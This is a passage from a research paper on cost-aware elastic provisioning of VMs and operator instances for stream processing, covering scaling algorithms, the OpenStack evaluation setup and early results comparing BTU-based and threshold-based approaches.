requirements ocpu of one operator and the value av of the artifact is defined by the number of items waiting on the operator type-specific queue oqueue. Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 9/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Because a specific instance of our optimization problem can be formulated as a knapsack problem, we can conclude that our optimization problem is also NP-hard. This concludes that there is no known solution which can obtain an optimal solution in polynomial time. Since this conclusion conflicts with the third requirement given in “Requirements,” we decided to realize a heuristic-based optimization approach, which can be solved in polynomial time. OPTIMIZATION APPROACH The overall goal our optimization approach is to minimize the cost for computational resources and maximize the usage of already leased VMs while maintaining the required QoS levels. Therefore, we apply an on-demand approach to reduce the deployment and configuration overhead, i.e., instantiating and removing additional operator instances, and minimize the computational resources required for finding an optimal deployment configuration. Due to our emphasis on the BTUs of VMs, we call our approach BTU- based approach in the remainder of this paper. Ensure sufficient processing capabilities To avoid penalty cost, our approach continuously evaluates the SLA compliance of the stream processing topology. Whenever the individual processing duration od of a particular operator type o exceeds or threatens to exceed the maximum allowed processing duration oslo according to the Upscaling Algorithm as shown in Algorithm 1, the upscaling procedure for the specific operator type is triggered. This upscaling procedure consists of several steps, as depicted in Fig. 4. The first task is to evaluate if any of the currently running hosts offers enough computational resources to host the additional instance of the specific operator. Therefore, we apply the Host Selection Algorithm, as described in Algorithm 2, for every currently running host to obtain a utility value for the host. Assuming that there is at least one host with a positive utility value, the host with the best utility value is selected to deploy the new operator instance, and the upscaling procedure is finished. When no host with a positive utility value is available, i.e., no hosts offers enough computational resources to instantiate a new instance for the required operator type, there are two possibilities to obtain the required computational resources. The first possibility is to scale down existing operators when they are not required anymore. We therefore apply the Operator Selection Algorithm, as described in Algorithm 3 and discussed in “Algorithms.” If there is any operator type that can be scaled down, an operator instance of this operator type will be scaled down to free resources for the upscaling operation. When there are no operator types which can be scaled down, i.e., all operators are needed for SLA-compliant data stream processing, the second possibility is applied where the SPE leases a new host. As soon as the resources are either provided by scaling down another operator type or the new host is running, the SPE deploys the required operator instance and finishes the upscaling procedure. Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 10/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Optimize resource usage To minimize the cost of computational resources, the optimization approach aims at using the leased resources as efficient as possible. This means that the SPE uses all paid resources until the end of their BTUs and evaluates shortly before, i.e., within the last 5% of the BTU, whether a host needs to be leased for another BTU, i.e., the resources are still required, or if the host can be released again. To release hosts, as shown in Fig. 5, all operator instances running on the designated host which is targeted to be shut down, need to be either released or migrated to other hosts. This releasing procedure consists of three phases. The first phase is a simulation phase, where the optimization approach creates a downscaling plan to evaluate whether the downscaling and migration is actually feasible. Hereby, the optimization approach applies the Operator Selection Algorithm for all operator types, which have running instances on this host and obtain their utility value. If any of the operator types has a positive utility value, all operator instances (up to 20% of all operator instances for the specific type) running on this host are marked to be released. The 20%-threshold for the operator instances is in place to avoid any major reconfigurations for a single operator type, since it may be the case that all operator instances for the operator type are running on this host and after the downscaling there would be not sufficient operator instances left Algorithm 1 Upscaling Algorithm 1: function UPTRIGGER(o,N) 2: if od > oslo then 3: upscaling = 1 4: end if 5: observationMean ¼ 1 N � PNi¼1 i 6: durationMean ¼ 1 N � PNi¼1 odi 7: � ¼ PN i¼1ði � observationMeanÞ � ðodi � durationMeanÞPN i¼1 ði � observationMeanÞ2 8: a = durationMean - b * observationMean 9: predictedDuration = a + b * (N + 1) 10: if predictedDuration > oslo then 11: upscaling = 1 12: end if 13: if upscaling = 0 then 14: return 0 15: end if 16: if oqueue > scalingThreshold then 17: return 1 18: end if 19: return 0 20: end function Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 11/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ which would trigger again the upscaling procedure. For those operator instances which cannot be shut down, the procedure simulates whether they can be migrated to other hosts. This simulation uses the upscaling procedure for operator types, as described in “Ensure Sufficient Processing Capabilities.” The only difference is that the host which is targeted to be shut down, is omitted as a suitable host. If the simulation renders no feasible downscaling plan, the host is leased for another BTU and the downscaling procedure is finished. In case there is a downscaling plan, the operators are released in phase two and if any migration is required, the upscaling procedure for operator types is triggered based on the simulation in phase three. When all operator instances are successfully removed (scaled down or migrated), the shutdown of the host is initialized. In the unlikely event that the downscaling plan could not be executed, i.e., the operator instance migrations fail, the host also needs to be leased for another BTU. Best host selected Sufficient processing capabili�es for specific operator type Add instance for specific operator type Not enough resources available Not enough resources available Try scaledown for other operator types Scaledown successful Scaledown not successful Enough resources availableLease another host Add instance for specific operator type Upscaling for a specific operator type triggered Assess u�lity of hosts Enough resources available Select best host Figure 4 Upscaling procedure for a specific operator type. Full-size DOI: 10.7717/peerj-cs.141/fig-4 Algorithm 2 Host Selection Algorithm 1: function UP(h,o) 2: feasibilityThreshold = min((hcpu*/ocpu), (hmemory*/omemory)) 3: if feasibilityThreshold < 1 then 4: return -1 5: end if 6: remainingCPU = hcpu* - ocpu 7: remainingMemory = hmemory* - omemory 8: difference ¼j remainingCPU hcpu � remainingMemory hmemory j 9: suitability ¼ difference feasibilityThreshold 10: if s ∈ himg then 11: suitability = suitability * CF 12: end if 13: return suitability 14: end function Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 12/36 http://dx.doi.org/10.7717/peerj-cs.141/fig-4 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Algorithms To realize our BTU-based provisioning approach, we have devised three algorithms, which are discussed in detail in this section. These three algorithms realize individual tasks for the upscaling and downscaling procedures as shown in Figs. 4 and 5. Algorithm 1 ensures the SLA compliance of the individual operator types on a regular basis by interpreting the monitoring information of the VISP Runtime. The other two algorithms are only triggered if a new operator instance needs to be started or when there is a shortage of free computational resources. These two algorithms analyze the SLA compliance and resource Algorithm 3 Operator Selection Algorithm 1: function DOWN(o) 2: if o# < 2 then 3: return -1 4: end if 5: instances ¼ o# � minðo# 2 OÞ maxðo# 2 OÞ � minðo# 2 OÞ 6: delay ¼ od oslo � 1 þ Pð Þ 7: scalings ¼ osP os2O os 8: if oqueue < 1 then 9: queueLoad = QL 10: else 11: queueLoad = 0 12: end if 13: return 1 + W1 * instances + W2 * queueLoad - W3 * delay - W4 * scalings 14: end function BTU of host ends No running operator instances Try scaledown of all operator instances Scaledown successful Scaledown not successful S�ll running operator instances Try migra�on of all operator instances Migra�on successful Migra�on is not successful S�ll running operator instances Host leased for another BTU Prolong leasing Host released Release host Downscaling plan exists Simulate operator downscaling and migra�on Simula�on not successful Simula�on succesful Figure 5 Downscaling procedure for a host. Full-size DOI: 10.7717/peerj-cs.141/fig-5 Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 13/36 http://dx.doi.org/10.7717/peerj-cs.141/fig-5 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ usage on demand at specific points in time and identify the most suitable host for upscaling (Algorithm 2) or potential operator types, which can be scaled down (Algorithm 3). Although these algorithms do not represent the core functionality of the resource provisioning approach, they are still essential to identify required upscaling operations and choose the optimal degree of parallelism per operator whereas the overall cost-reduction and reconfiguration is represented by the downscaling procedure shown in Fig. 5. The remainder of this section discusses the structure and rationale of these three algorithms in detail. The Upscaling Algorithm as listed in Algorithm 1 is used to evaluate whether any operator needs to be scaled up. This algorithm is executed on a regular basis for each operator type o and either returns 0, if the current stream processing capabilities are enough to comply with the SLAs, or 1 if the operator type needs to be scaled up. Therefore, this algorithm considers, on the one hand, the current processing duration of the operator (Line 2) and, on the other hand, the trend of the previous processing durations. For the trend prediction, we apply a simple linear regression for the last N observations, based on the linear least squares estimator (Lines 5–9). If the current duration od or the predicted duration is higher than the SLO oslo, we consider the operator type to be scaled up (Line 10). Before we trigger the upscaling operation, we apply an additional check if the upscaling operation is required. The stream processing topology may retrieve short-term data volume peaks, e.g., due to short network disruptions. These peaks would not require any additional computational resources, because they would be dealt with after a short time with the already available processing capabilities. Nevertheless, the upscaling algorithm would trigger the upscaling procedure, because it would detect the processing delay. Therefore, the algorithm also considers the current load of data items oqueue before scaling up by checking whether the amount of queued items for processing exceeds a scalingThreshold (Lines 13–16). Algorithm 2, i.e., the Host Selection Algorithm, is used to rank all currently leased hosts according to their suitability to host a new operator instance of a particular operator type. Therefore, the algorithm evaluates for each host h whether a new instance of the required operator type o could be hosted on that specific host at all. Here, the algorithm considers both, the CPU and memory requirements, and derives the maximum amount of instances that can be hosted. If this value is less than 1, i.e., there are no resources left for a single additional operator instance, the function returns a negative value. The first check evaluates the feasibility of deploying a new operator instance on the host (Lines 2–5). In a second stage, this algorithm evaluates the suitability of this host. Here the algorithm simulates the resource usage of the host, assuming the operator instance would be deployed on the host. The overall goal is an equal distribution of CPU and memory usage across all hosts, to avoid situations where hosts maximize their CPU usage, but hardly use any memory and vice versa. Therefore, the algorithm calculates the difference between the normalized CPU usage and memory usage, whereas a lower value represents a better ratio between CPU and memory and therefore a better fit (Lines 6–9). Besides the equal distribution of memory and CPU on the individual hosts, we also want to distribute Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 14/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ the operators equally among all currently leased hosts. The assigned CPU ocpu and memory omemory attributes only represent the resources which are guaranteed for the operators. This allows operators to use currently unused resources of the hosts based on a first come first service principle. To maximize the usage, we aim for an equal distribution of the unassigned resources, i.e., hcpu� and hmemory�, which can be used by the operators to cover short-term data volume peaks without any reconfigurations required. This aspect is covered by dividing the difference value by the feasibility value to prefer those hosts which are least used (Line 9). Last, we also consider the deployment time aspect for a particular operator type. Here, we prefer those hosts, which have already the operator image cached. While such operator images may be rather small for SPEs which operate on a process or thread level, like Apache Storm, these images can reach up to 100 MB for containerized operators. This requires some time to download the operator images from an external repository. In order to distinguish hosts, which have a cached copy of the operator image from those hosts that do not have a cached copy of the operator image, we multiply the suitability with a constant factor CF to create two different groups of hosts for the overall selection (Lines 10–12). For this constant factor, we recommend to use the value 0.01 which was also used in the remainder of our work. The value 0.01 was chosen to clearly distinguish these two groups, since the actual suitability values are always in the range of 0–1 based on the structure of the algorithm. Each of these group maintains their resource-based ordering, but we prioritize those hosts that provide a faster startup time due to the cached image, i.e., the group with lower values. The result of this algorithm is either a negative value for a host, i.e., the host can run the new operator instance, or a positive value, whereas the lowest value among several hosts shows the best suitability. Algorithm 3, i.e., the Operator Selection Algorithm, is used to select operator types which can be scaled down without violating the SLOs. Therefore, this algorithm considers several static as well as runtime aspects of the operator types. The goal of the algorithm is to obtain a value which describes the suitability of a particular operator type to be scaled down. Whenever the value is negative, the operator type must not be scaled down, i.e., all operator instances for this type are required to fulfill the SLO. First, the algorithm ensures that there is at least one operator instance for the given operator type (Lines 2–4). Second, the function considers the amount of all currently running instances for the specific operator type and normalizes it to obtain a value between 0 and 1 (Line 5). This normalization is carried out based on the maximal respectively minimal amount of instances for all operator types. This value represents the aspect that it is better to scale down an operator type with numerous operator instances because the scale down operation removes a smaller percentage of processing power compared to an operator type with fewer operator instances. Furthermore, we consider the SLA compliance of the particular operator. Here, we consider the actual compliance for the processing duration and multiply it with the penalty cost as a weighting factor (Line 6). Since the penalty cost for the violation of a single data item is typically lower than 1, we add 1 to the penalty cost P. Whenever the processing duration od takes longer than the SLO oslo, the delay value will be less than 1, Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 15/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ but when there is any delay, the delay value can become arbitrarily high. The next value for consideration is the relative amount of scaling operations (both up and down) in contrast to the entire scaling operations (Line 7). Here, we penalize previous scaling operations because we want to avoid any oscillating effects, i.e., multiple up- and down-scaling operations for a specific operator. The last factor is the queueLoad. In the course of our evaluations, we have seen that the algorithm may take a long time to recover after a load peak, i.e., release obsolete operator instances as soon as the data is processed. This can be observed when the SPE is confronted with a massive data spike followed by a small data volume for some time. For this scenario, the heuristic discourages any downscaling operation due to the delay factor, which may be high due to the delayed processing of the data spike. To resolve this shortcoming, we introduce the queueLoad factor QL, which encourages the downscaling of an operator type, as soon as no data items are waiting in the incoming queue oqueue (Lines 8–12). For QL we recommend the use of the value 100 to clearly indicate that the operator type can be scaled down, regardless of the other values which are in the range of 0–1 for the instances and scalings value or significantly lower than 100 for the delay value. This value was selected based on a number of preliminary experiments prior to the actual evaluation where the data processing never took longer than 50 times of the intended processing duration. Finally, we join the distinct aspects to obtain the overall utility value. While the number of instances and queueLoad represent a positive aspect to scale down an operator, all other aspects discourage a scaling operation. The instances and scalings value are normalized between 0 and 1 whereas the scalings value can exceed 1 if the data processing is delayed. Therefore, we introduce optional weights W1, W2, W3, and W4 for the different aspects, whereas the default value for each of these weights is 1 to treat all aspects with the same emphasis. The result is the utility value, which describes the suitability of the particular operator to be scaled down, whereas a higher value suggests a better suitability (Line 13). EVALUATION Evaluation setup For our evaluation, we revisit our motivational scenario (see Motivation) and discuss the concrete implementation of this topology. Sensor types First, we are going to discuss the sensors which emit the data items for our topology. In this topology, we consider three different sensor types, as listed in Table 1. Each of these sensor types generates a data item, with a particular structure, which can be only processed by a dedicated operator type, e.g., O1 for sensor type S2. Due to the different structure, the size of the data items also differs. The first and the last sensor type (S1 and S3) encode the information in plain text. This results in rather small data items with a size of 90–95 Bytes. The second sensor type encodes the information with an image and is therefore much larger, i.e., around 12,500 Bytes. Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 16/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Operator types The second important implementation aspect for the topology are the operators. Each of these operator types performs a specific task with specific resource requirements and specific processing durations. Table 2 lists all operator types which are used in this evaluation. Each operator is assigned a number of different performance as well as resource metrics. The resource metrics represent mean values across several topology enactments. The processing duration represents the average times which are required to process one specific data item as well as the time the data item is processed within the messaging infrastructure between the previous operator and the one in focus. The CPU metric represents the amounts of shares which are required by the operator when executed on a single core VM. The memory value represents the mean memory usage. This memory value accumulates the actual used memory by the operator instances and the currently used file cache, which results in a rather high value compared to the actual size of the operator image. The CPU metric and the memory metric are determined based on long-term recordings, whereas the stated value in the table is calculated by adding both the absolute maximum and the average value of all observations for a specific operator and dividing this value by 2. For the processing duration, we have conducted several preliminary evaluations, where the SPE is processing constant data volumes in a fixed over-provisioning scenario to avoid any waiting durations for the recordings. For the storage operator, we have three different sizes. Because the majority of the processing operators only implement processing logic, the size of the images is the same. The only two exceptions are the Generate Report (O9) image, which also contains a PDF Table 1 Sensor types. Emission rate/min Size (Bytes) Availability sensor (S1) 5 95 Production data (S2) 1 12,500 Temperature sensor (S3) 10 90 Table 2 Stream processing operator types. Processing duration (ms) CPU shares Memory (MB) Storage (MB) State Outgoing ratio Parse and Distribute Data (O1) 1,500 660 452 89 ✓ 1:3 Filter Availability (O2) 600 131 524 68 ✓ 50:1 Calculate Performance (O3) 750 100 430 68 ✓ 1:1 Calculate Availability (O4) 750 83 502 68 ✓ 1:1 Calculate Quality (O5) 750 77 527 68 ✓ 1:1 Monitor Temperature (O6) 600 65 440 68 ✓ 100:1 Calculate OEE (O7) 700 46 464 68 ✓ 3:1 Inform User (O8) 500 74 466 68 ✓ 1:0 Generate Report (O9) 1,300 47 452 70 ✓ 300:1 Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 17/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ generation library and the Parse and Distribute Data (O1) operator image, which also contains the tesseract binary, which is required to parse the images. Each of the stateful operators, as indicated in the table, can store and retrieve data from the shared state to synchronize the data among different data items and different instances of one operator type. The outgoing ratio describes whether a particular operator type consumes more data items than it emits, e.g., O7 combines three data items before it emits a combined one, or whether it emits more data items than it receives, e.g., O1 distributes the production information to three other operator types. For our scenario, we have implemented nine different operators (https://github.com/ visp-streaming/processingNodes) as Spring Boot (https://projects.spring.io/spring-boot/) applications, which are discussed in detail in the remainder of this section. Parse and distribute data (O1) The Parse and Distribute Data operator type is designed to receive an image with encoded production data and parse this image to extract the information. For our implementation, we use the tesseract OCR engine (https://github.com/tesseract-ocr/ tesseract) to parse the image and then the Spring Boot application forwards the machine- readable production data to the downstream operator types. Filter availability (O2) Each manufacturing machine can have three different availability types: available, planned downtime, and defect. While the first two types represent intended behavior, the last type signals a defect and should be propagated to a human operator. This operator issues a warning for each new defect notification and filters all other data items. Calculate performance (O3) The Calculate Performance operator type calculates the performance of the last reporting cycle, i.e., the time between two production data emissions. The actual performance is derived by the formula shown in Eq. (2) (Nakajima, 1988). performance ¼ producedItems � idealProductionTime reportingCycle (2) Calculate availability (O4) The Calculate Availability operator type represents the overall availability of the manufacturing machine from the beginning of the production cycle, e.g., the start of the evaluation. The availability is defined by the formula shown in Eq. (3) (Nakajima, 1988). availability ¼ totalTime � scheduledDowntime � unscheduledDowntime totalTime (3) Calculate quality (O5) The Calculate Quality operator type represents the ratio between all produced goods against defect goods from the beginning of the production cycle. The quality is defined by the formula shown in Eq. (4) (Nakajima, 1988). Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 18/36 https://github.com/visp-streaming/processingNodes https://github.com/visp-streaming/processingNodes https://projects.spring.io/spring-boot/ https://github.com/tesseract-ocr/tesseract https://github.com/tesseract-ocr/tesseract http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ quality ¼ totalProducedGoods � totalDefectiveGoods totalProducedGoods (4) Monitor temperature (O6) The Monitor Temperature operator type filters all temperatures below a predefined threshold and issues a notification to the human operator for each new temperature violation. Calculate OEE (O7) The Calculate OEE operator synchronizes the upstream operations based on the timestamp of the initial data item and calculates the overall OEE value according to the formula in Eq. (5). OEE ¼ availability � performance � quality (5) Inform user (O8) The Inform User operator type forwards the notifications to a human user. In our evaluation scenario, this operator type only serves as a monitoring endpoint for the SLA compliance and all incoming data items are discarded at this operator type. Generate report (O9) The Generate Report operator aggregates multiple OEE values and generates a PDF report which aggregates a predefined amount of OEE values. This report is then forwarded to the user for further manual inspection. Evaluation deployment For our evaluation, we make use of the VISP Testbed (Hochreiner, 2017), which is a toolkit of different evaluation utilities that support repeatable evaluation runs. The most notable component of this toolkit is the VISP Data Provider, which allows simulating an arbitrary amount of data sources. Furthermore, the Data Provider also allows defining different arrival patterns (see Data Arrival Pattern) to evaluate the adaptation possibilities of the VISP Runtime, in particular of its scaling mechanisms. The evaluation runs are carried out in a private cloud running OpenStack (https://www.openstack.org), whereas the components are deployed on different VMs, as depicted in Fig. 6. The most relevant VM for our evaluation is the Infrastructure VM, which hosts the VISP Runtime as well as all other relevant services, like the Message Infrastructure, i.e., RabbitMQ (https://www.rabbitmq.com), the Shared State, i.e., Redis (http://redis.io) and the Data Storage, i.e., a MySQL (https://www.mysql.com) database. For the topology enactment, the VISP Runtime leases (and releases) an arbitrary amount of VMs, i.e., Dockerhost VMs, on the private OpenStack-based cloud at runtime. These Dockerhost VMs are used to run the Operator Instances, which take care of the actual data processing as described in “System Architecture.” The Operator Images, which are required to run the Operator Instances, are hosted on an external service, i.e., Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 19/36 https://www.openstack.org https://www.rabbitmq.com http://redis.io https://www.mysql.com http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Dockerhub (https://hub.docker.com). Finally, the Data Provider VM is in charge of simulating the data stream from the sensors, as described in “Sensor Types.” Evaluation configuration For the scalingThreshold used in Algorithm 1, we use the value 50. This value was selected to be high enough to allow for minimal hardware disturbances, e.g., moving data from memory to the hard drive, but low enough to react to small changes of the data volume. The concrete value was identified on a number of preliminary experiments, evaluating different thresholds in the range of 10–1,000 items, whereas the threshold 50 was identified as the most suitable value for our purpose. Regarding the individual weights W1–W4 used in Algorithm 3, we use the default value of 1 to evaluate the base design of our BTU-based provisioning approach without any specific emphasis on either the number of instances, scaling operations, queue load or the processing delay. Besides the configuration aspects for Algorithms 1 and 3, there are also several other configuration aspects for the VISP Runtime. We chose a monitoring timespan of 15 s, i.e., the queue load and resource usage of the system is recorded every 15 s. The resource provisioning interval is set to 60 s. This interval has been selected to update the resource configuration for the SPE in short time intervals while ensuring enough time to download Operator Images from the external repository within one resource provisioning interval. Regarding the BTU, we use three different BTU durations. The first duration is 60 min (BTU60), which used to be the predominant BTU of Amazon EC2 (https://aws.amazon. com/emr/pricing/). The second duration is 10 min (BTU10), which represented the minimal BTU for the Google Compute Engine (https://cloud.google.com/compute/ pricing) and the last duration is 30 min (BTU30), which has been selected to present a middle ground between the other two BTUs. Furthermore, we assume a linear pricing model for the BTUs, i.e., one leasing duration for the BTU10 model results in 1 cost, one leasing duration for the BTU30 model results in 3 cost and the leasing duration for the BTU60 model results in 6 cost. For each data item, which is delayed, we accrue 0.0001 penalty cost, i.e., 10,000 delayed items render the same cost as leasing a VM for 10 min. These penalty cost have been chosen to impose little cost for delayed processing compared to penalty cost in other domains, e.g., for business processes (Hoenisch et al., 2016). However, preliminary experiments have shown that higher penalty cost, OpenStack Cloud VISP Data Provider VISP Run�me Message Infrastructure Shared State Data Storage Operator Instance Operator Instance Docker Hub Operator Image Operator ImageData Provider VM Infrastructure VM Dockerhost VM Figure 6 Deployment for the evaluation scenario. Full-size DOI: 10.7717/peerj-cs.141/fig-6 Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 20/36 https://hub.docker.com https://aws.amazon.com/emr/pricing/ https://aws.amazon.com/emr/pricing/ https://cloud.google.com/compute/pricing https://cloud.google.com/compute/pricing http://dx.doi.org/10.7717/peerj-cs.141/fig-6 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ e.g., 0.001 or 0.01, would render unreasonable high penalty cost compared to the actual resource cost even for a high SLA compliance. Finally, each Dockerhost VM has the same computational resources with four virtual CPU cores and 7 GB RAM. Baseline To evaluate our BTU-based provisioning approach, we have selected a threshold-based baseline provisioning approach. The baseline implements a commonly used provisioning approach which already achieves very good results in terms of cost reduction against an over-provisioning scenario as shown in our previous work (Hochreiner et al., 2016a). The approach considers the amount of data items waiting on the incoming queue for processing as scaling trigger. As soon as the variable oqueue exceeds an upper threshold according to Algorithm 1, the SPE triggers an upscaling operation for this operator and as soon as oqueue falls below a lower threshold, i.e., 1, the SPE triggers one downscaling action of an operator. Besides the single upscaling trigger, our threshold-based approach triggers the upscaling operation twice, if oqueue surpasses a second upper threshold of 250 data items waiting for processing. Regarding the leasing of VMs, we apply an on-demand approach, where the SPE leases a new VM as soon as all currently used VMs are fully utilized and releases a VM, as soon as the last operator instance on that VM is terminated. Data arrival pattern For our evaluation, we have selected four different arrival patterns which simulate different load scenarios for the SPE by submitting varying data volumes to the SPE. The first arrival pattern has three different data volume levels, which are changed stepwise, so that the resulting arrival pattern could be approximated to a sinus curve, as shown in Fig. 7A. These three different volume levels simulate different amounts of manufacturing machines ranging from two to eight machines that emit different amounts of data items, as shown in Table 1. To speed up the evaluation, we simulate the real time data emissions shown in Table 1 every 480 ms. This enables us on the one hand to simulate 500 real-time minutes within only 4 min in the course of our evaluation and therefore also increases the load on the SPE. This also results in a volume level change every 4 min. The second arrival pattern has only two levels, i.e., the lowest and the highest of the first pattern, which confronts the SPE with more drastic volume changes, as shown in Fig. 7B. Due to the fact that we only apply two different levels, the state changes are twice as long as for the first pattern, i.e., 8 min. The third and the fourth pattern represent random walks as defined by Eq. (6), whereas R represents a random number between 0 and 1. This random walk is initialized with machine = 4 and we have selected two random walk patterns which stay between one and eight machines. The results of this random walk can be seen in in Fig. 7C for the first random walk and in Fig. 7D for the second one. Due to the random characteristic of the pattern generation, this pattern exhibits more changes of the data volume in short times compared to the first two data arrival patterns. Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 21/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ machinen ¼ machinen�1 � 1 R < 0:4 machinen�10:4 � R � 0:6 machinen�1 þ 1 R > 0:6 8 < : (6) All four patterns are continuously generated by the VISP Data Provider (https:// github.com/visp-streaming/dataProvider) throughout the whole evaluation duration of 120 min. Metrics To compare the evaluation results for both the BTU-based and the threshold-based resource provisioning approaches, we have selected several metrics to describe both the overall cost as well as SLA compliance metrics. After each evaluation run, these metrics are extracted by the VISP Reporting Utility (https://github.com/visp-streaming/reporting). The most important metric is Paid BTUs, which describes the total cost for data processing. This value comprises all VM Upscaling and VM Prolonging operations, which either lease new VMs or extend the leasing for another BTU for existing ones. The VM 0 20 40 60 80 100 120 0 2 4 6 8 (A) Stepwise Pattern Time (Minutes) M a n u fa ct u ri n g M a ch in e s 0 20 40 60 80 100 120 0 2 4 6 8 (B) 2−Level Pattern Time (Minutes) M a n u fa ct u ri n g M a ch in e s 0 20 40 60 80 100 120 0 2 4 6 8 (C) Random Walk Pattern 1 Time (Minutes) M a n u fa ct u ri n g M a ch in e s 0 20 40 60 80 100 120 0 2 4 6 8 (D) Random Walk Pattern 2 Time (Minutes) M a n u fa ct u ri n g M a ch in e s Figure 7 Data arrival patterns. (A) shows the stepwise data arrival pattern; (B) shows the 2-level data arrival pattern; (C) shows the data arrival pattern based on the random walk 1; (D) shows the data arrival pattern based on the random walk 2. Full-size DOI: 10.7717/peerj-cs.141/fig-7 Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 22/36 https://github.com/visp-streaming/dataProvider https://github.com/visp-streaming/dataProvider https://github.com/visp-streaming/reporting http://dx.doi.org/10.7717/peerj-cs.141/fig-7 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Downscaling sums up all downscaling operations, which are conducted before the end of the BTU. The next set of metrics describes the SLA compliance of the stream processing application. Each stream processing operator is assigned a specific processing duration which describes the processing duration in a constant over-provisioning scenario. Due to the changing data volume in our evaluation scenarios, it is often the case that the system suffers from under-provisioning for a short time, which results in longer processing durations. To assess the overall compliance of the processing durations, we define three different SLA compliance levels. The first compliance level requires real-time processing capabilities, and states the share of data items that are produced within the given processing duration. The second level applies near-real-time requirements, which is defined by processing durations that take at most twice as long as the defined processing duration, and the third level applies a relaxed strategy, which means that the data items need to be processed within at most five times the stated processing duration. These SLA metrics are obtained from the processing duration of the data items, which are recorded by the operators. To reduce the overall monitoring overhead, we only measure the processing duration of every 10th data item. Nevertheless, preliminary evaluations with other intervals, e.g., every data item or every third data item have shown a similar metric reliability. This similar reliability can be explained due to the fact that observing every 10th data item still yields about 20–40 performance readings/second (depending on the data volume). Therefore it is save to assume that these metrics cover all scaling decisions of the SPE because all other activities, e.g., spawning a new operator instance takes 5–10 s or leasing a new VM takes about 30–60 s. The Time to Adapt metric states the arithmetic mean duration, which is required until the delayed processing for an operator type is back to real-time processing. The last metrics describe the scaling operations of operator instances. Here we consider Upscaling, Downscaling as well as Migration operations among different hosts. RESULTS AND DISCUSSION For our evaluation we consider four different provisioning approaches. The first approach is the BTU-agnostic threshold-based approach while the other three approaches are BTU- based approaches with three different BTU configurations as discussed in “Evaluation Deployment.” To obtain reliable numbers, we have conducted three evaluation runs for each provisioning approach and data arrival pattern, which results in 48 evaluation runs. These evaluations have been executed over the time span of four weeks on a private OpenStack cloud. The raw data of the evaluation runs is hosted on Github (https://github. com/visp-streaming/PeerJ_rawData) and the concrete numbers can be reproduced by means of the VISP Reporting tool (https://github.com/visp-streaming/reporting). The discussion of our evaluation is divided in four subsections based on the four data arrival patterns. Each subsection features a table which lists the average numbers of the three evaluation runs alongside with their standard deviations. Additionally, we also provide a figure which represents the resource configurations of the operator instances and VMs over the course of the evaluation for each data arrival pattern. Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 23/36 https://github.com/visp-streaming/PeerJ_rawData https://github.com/visp-streaming/PeerJ_rawData https://github.com/visp-streaming/reporting http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ For the discussion we are going to analyze the differences between the BTU-based and the threshold-based approach in detail only for the stepwise data arrival pattern because this arrival pattern allows us to isolate specific aspects of the BTU-based approach. Nevertheless, our evaluations shows that the overall trend regarding the SLA compliance and total cost is the same for all four data arrival patterns. For the other arrival patterns we only highlight specific aspects of the individual pattern and refer for all other effects to the discussion of the stepwise data arrival pattern. Stepwise data arrival pattern For the stepwise pattern, we can see that the overall SLA compliance is higher for the BTU- based approach for all three SLA compliance scenarios as shown in Table 3. This compliance benefit ranges from 9% for the BTU10 configuration in the real-time compliance scenario, up to 24% in the relaxed compliance scenario for the BTU60 configuration. The SLA compliance gain can be explained due to the downscaling strategy of the BTU-based approach in contrast to the on-demand one for the threshold- based approach. The threshold-based approach only considers the amount of data items that are considered for processing based on each operator type for the scaling decisions, which can be observed in Fig. 8D. This figure shows that the line for the operator instances follows the data volume very closely with a short delay because the threshold-based approach can only react based on the changes of the data volume. On closer inspection, one can also identify smaller increases after the downscaling phase, e.g., around minutes 40, 55 or 70. These smaller bumps indicate that the downscaling approach was too eager and the SPE has to compensate it by scaling up again. Throughout this time span, i.e., between the detection of a lack of processing capabilities and the successful upscaling for the operator type, the SPE is very likely to violate the SLA compliance, especially in the real-time scenario. The BTU-based approach does not exhibit such a strongly coupled relationship between the operator instances and the data volume. While the upscaling trigger is the same for both scenarios, there are clear differences in the downscaling behavior. The BTU- based approach only considers downscaling activities briefly before the end of a BTU, e.g., around minutes 20 or 40 for the BTU10 scenario, around minute 30 for the BTU30 scenario and around minute 60 for the BTU60 scenario in Figs. 8B and 8C. The result of Table 3 Evaluation results for stepwise scenario. BTU-based Threshold-based BTU10 BTU30 BTU60 BTU10 BTU30 BTU60 Real-time compliance 49% (s = 1%) 52% (s = 1%) 53% (s = 1%) 40% (s = 1%) 